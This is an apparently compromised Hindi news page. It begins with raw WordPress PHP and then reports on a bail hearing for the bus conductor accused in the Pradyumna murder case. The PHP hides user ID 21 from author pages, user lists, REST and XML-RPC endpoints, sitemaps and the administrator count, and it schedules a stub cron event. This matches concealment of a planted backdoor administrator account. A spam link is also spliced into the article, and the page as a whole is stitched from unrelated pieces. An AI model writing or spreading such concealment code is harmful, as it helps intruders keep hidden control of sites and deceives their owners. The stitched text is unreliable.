add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
प्रद्युम्न मर्डर केस – आरोपी बस कंडक्टर अशोक कुमार की जमानत याचिका पर सुनवाई आज - Press Ki Taquat
No Result
View All Result
नई दिल्ली – प्रद्युम्न मर्डर केस में मुख्य संदिग्ध बस कंडक्टर अशोक कुमार की जमानत याचिका पर गुरुवार को रोहतक कोर्ट में सुनवाई होगी। इससे पहले आरोपी बस कंडक्टर के वकील मोहित वर्मा ने अतिरिक्त जिला मजिस्ट्रेट और सत्र न्यायाधीश रजनी यादव के सम्मुख जमानत संबंधित याचिका रखी थी, जिसपर 16 नवंबर को सुनवाई का तारीख़ तय की गई। आरोपी के वकील ने गुरुग्राम से रोहतक जाकर जमानत याचिका दाखिल की। वकील ने बताया, ‘हमने कोर्ट के समक्ष याचिका दायर की है और कोर्ट ने 16 तारीख़ को अगली सुनवाई तय की है। कोर्ट इस मामले में सीबीआई का रुख़ भी जानना चाहता है। आगे उन्होंने कहा, ‘कोर्ट ने सीबीआई को 16 नवंबर के दिन सुबह 10 बजे कार्रवाई में उपस्थित होने को कहा है। इस दौरान मेरे और सरकारी अभियोजक के बीच बहस होगी। ये जमानत याचिका के लिए सामान्य तरीका है। सबसे पहले याचिका दाखिल की जाती है। फिर सभी पक्षों को नोटिस भेजा जाता है, दलील सुनी जाती है और उसी आधार पर याचिका स्वीकार या अस्वीकार की जाती है’Where expertise meets opportunity Prime Vermogen official website.
Post Views: 347
No Result
View All Result